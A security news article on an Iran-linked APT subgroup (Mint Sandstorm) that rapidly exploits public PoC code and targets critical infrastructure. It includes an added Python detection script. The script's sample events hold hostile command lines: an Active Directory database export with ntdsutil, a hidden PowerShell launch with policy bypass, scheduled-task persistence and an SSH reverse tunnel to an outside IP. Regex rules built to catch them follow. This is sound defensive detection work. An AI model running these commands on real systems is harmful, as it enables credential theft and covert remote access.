Microsoft has issued a warning about a subgroup of the Iran-linked advanced persistent threat (APT) actor Mint Sandstorm, which has started to rapidly adopt proof-of-concept (PoC) exploit code targeting vulnerabilities in internet-facing applications. The nation-state group is also tracked as TA453, Ajax Security Team, Charming Kitten, APT35, Magic Hound, NewsBeef, Newscaster, and Phosphorus. According to Microsoft, the group has been active since at least 2011 and has targeted activists, government entities, journalists, critical infrastructure, and other organizations. Microsoft associates the overall activity of Mint Sandstorm with the Islamic Revolutionary Guard Corps (IRGC), an intelligence arm of Iran’s military.
One of the subgroups under Mint Sandstorm has specialized in compromising high-value targets for information theft and was recently observed quickly adopting PoC code for known vulnerabilities. Initially, the subgroup focused on performing reconnaissance, but in 2022, it transitioned to directly targeting critical infrastructure organizations in the United States, including energy companies, seaports, transit systems, and a major utility and gas company. Microsoft noted that these attacks were “potentially in support of retaliatory destructive cyberattacks.”
The Mint Sandstorm subgroup was seen adopting PoC exploitation code for N-day vulnerabilities (flaws that are publicly disclosed, and often patched by the vendor, but not yet remediated by every organization) quickly after the code was released. Previously, the threat actor took weeks to weaponize exploits for vulnerabilities such as ProxyShell and Log4Shell. Microsoft reports that “Mint Sandstorm began exploiting CVE-2022-47966 in Zoho ManageEngine on January 19, 2023, the same day the POC became public. They later exploited CVE-2022-47986 in Aspera Faspex within five days of the POC being made public on February 2, 2023.”
Microsoft warns that Mint Sandstorm continues to exploit older vulnerabilities for initial compromise, mostly as part of ‘opportunistic and indiscriminate’ activity, which underlines the need to apply patches for known vulnerabilities in a timely manner. Following initial compromise, the Mint Sandstorm subgroup deploys a custom PowerShell script for discovery, moves laterally using Impacket, and then deploys additional tools. In some attacks, the subgroup used PowerShell scripts for account enumeration and RDP connections, together with an SSH tunnel for command-and-control (C&C), in order to steal the victim’s Active Directory database, compromise user credentials, and access user accounts. In other attacks, the subgroup created scheduled tasks for persistence, used webhook.site for C&C, and deployed custom malware.
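The post-compromise chain described above (PowerShell discovery, Impacket lateral movement, scheduled-task persistence, webhook.site and SSH-tunnel C&C, Active Directory database theft) is the kind of behaviour a detection engineer would hunt for in process-creation and network telemetry. The following is an added example, not Microsoft’s detection logic and not code from the actor’s tooling. The event records are constructed for the example; their field names (`host`, `type`, `image`, `cmdline`, `dest`, `dport`) are an assumed normalised schema, and the Impacket rule assumes the well-known default command-line shape of `wmiexec.py`, which redirects output to `\\127.0.0.1\ADMIN$\__<timestamp>`.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry), shaped like normalised
# process-creation and network-connection records from an EDR/Sysmon pipeline.
SAMPLE_EVENTS = [
    {"host": "srv01", "type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -f C:\\ProgramData\\enum.ps1"},
    # Assumed wmiexec.py artifact: output redirected into the ADMIN$ share.
    {"host": "srv01", "type": "process", "image": "cmd.exe",
     "cmdline": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1674120001.23 2>&1"},
    {"host": "dc01", "type": "process", "image": "ntdsutil.exe",
     "cmdline": 'ntdsutil.exe "ac i ntds" ifm "create full C:\\Temp\\x" q q'},
    {"host": "srv01", "type": "process", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\\ProgramData\\u.exe /ru SYSTEM"},
    {"host": "srv01", "type": "network", "image": "powershell.exe",
     "dest": "webhook.site", "dport": 443},
    {"host": "srv01", "type": "process", "image": "ssh.exe",
     "cmdline": "ssh.exe -N -R 9000:127.0.0.1:3389 user@203.0.113.10 -p 443"},
    # Benign noise: a task query (not creation) and ordinary browser traffic.
    {"host": "ws07", "type": "process", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /query /tn Updater"},
    {"host": "ws07", "type": "network", "image": "chrome.exe",
     "dest": "example.com", "dport": 443},
]

# (rule id, severity, event type, field to inspect, pattern)
RULES = [
    ("impacket_wmiexec_cmdline", "high", "process", "cmdline",
     re.compile(r"cmd\.exe /Q /c .*1> ?\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I)),
    ("ntds_dit_export", "high", "process", "cmdline",
     re.compile(r"(ntdsutil\.exe.*\bifm\b|vssadmin\.exe\s+create\s+shadow|\\ntds\.dit)", re.I)),
    ("schtasks_create", "medium", "process", "cmdline",
     re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)),
    ("ssh_reverse_tunnel", "medium", "process", "cmdline",
     re.compile(r"\b(ssh|plink)(\.exe)?\b.*\s-[a-zA-Z]*[RL]\s+\d+:", re.I)),
    ("webhook_site_c2", "medium", "network", "dest",
     re.compile(r"(^|\.)webhook\.site$", re.I)),
    # Generic suspicious PowerShell launch; the page names a custom discovery
    # script but not its command line, so these flags are an assumption.
    ("powershell_hidden_script", "medium", "process", "cmdline",
     re.compile(r"powershell(\.exe)?.*(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)),
]


def scan(events):
    """Return (host, rule_id, severity, evidence) for every event/rule match."""
    hits = []
    for ev in events:
        for rule_id, severity, ev_type, field, pat in RULES:
            if ev.get("type") != ev_type:
                continue
            value = str(ev.get(field, ""))
            if pat.search(value):
                hits.append((ev["host"], rule_id, severity, value))
    return hits


def score_hosts(events, min_distinct_rules=2):
    """Flag a host on any high-severity hit, or when several distinct medium
    rules fire on it. Single medium rules (schtasks, ssh) are common admin
    activity; the chain discovery -> lateral movement -> persistence/C2 is
    what distinguishes the intrusion pattern described in the article."""
    per_host = defaultdict(set)
    high = set()
    for host, rule_id, severity, _ in scan(events):
        per_host[host].add(rule_id)
        if severity == "high":
            high.add(host)
    return {h: sorted(r) for h, r in per_host.items()
            if h in high or len(r) >= min_distinct_rules}


if __name__ == "__main__":
    for host, rules in score_hosts(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Running the block flags `srv01` on five distinct rules and `dc01` on the NTDS export alone, while `ws07` stays quiet. In production the regexes would be tuned against the environment’s own admin baseline, and the webhook.site rule is better fed from DNS or proxy logs than from endpoint network events.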
Since 2022, the threat actor has been observed using two custom implants: Drokbk (a .NET implant consisting of an installer and a backdoor) and Soldier (a multistage .NET backdoor that can fetch additional payloads and uninstall itself). In some instances, the subgroup relied on low-volume phishing campaigns targeting “individuals affiliated with high-profile think tanks or universities in Israel, North America, or Europe with ties to the security and policy communities” with malicious documents leading to the CharmPower modular backdoor. Microsoft concludes that “capabilities observed in intrusions attributed to this Mint Sandstorm subgroup are concerning as they allow operators to conceal C&C communication, persist in a compromised system, and deploy a range of post-compromise tools.”